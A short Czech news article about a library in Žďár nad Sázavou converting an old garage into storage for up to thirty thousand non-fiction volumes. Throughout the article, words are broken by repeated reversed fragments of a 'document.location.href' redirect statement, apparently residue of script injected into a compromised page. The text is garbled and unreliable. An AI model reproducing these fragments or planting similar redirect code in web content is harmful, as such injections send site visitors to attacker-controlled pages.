Rainbow page separator

V knihovně vybudovali nový depozit pro naučnou literaturu

Sobota, 23. ledna 2021

Žďár nad Sázavou / Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pro uskladnění až třiceti tisícovek svazků naučné a cizojazyčné literatury vyčlenili zaměstnanci žďárské Knihovny Matěje Josefa Sychry v suterénu objektu. Vyřešilo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dlouhodobou potřebu dalšího depozitu, aby mohl být unikátní fond nauč¬né literatury zachován v plné výši. Nový sklad pro naučnou literaturu vznikl v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách staré garáže, která byla před třiceti lety postavená pro parkování bibliobusu a později ji dlouhou řadu let využívala poš[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní auta.
Přestěhování tisíců svazků knih předcházela rekonstrukce zmíněné garáže v podobě pokládky nové lité be[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonové podlahy, zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovení nových omítek, schodů a také provedení protipožárního nástřiku stropu a regálů na knihy. Rekonstrukcí postupně projdou také původní sklady naučné literatury, které následně poslouží pro skladování beletrie a dětské literatury. Žďárská knihovna, která je velmi dobře vybavena, disponuje téměř dvěma sty tisíci různých titulů.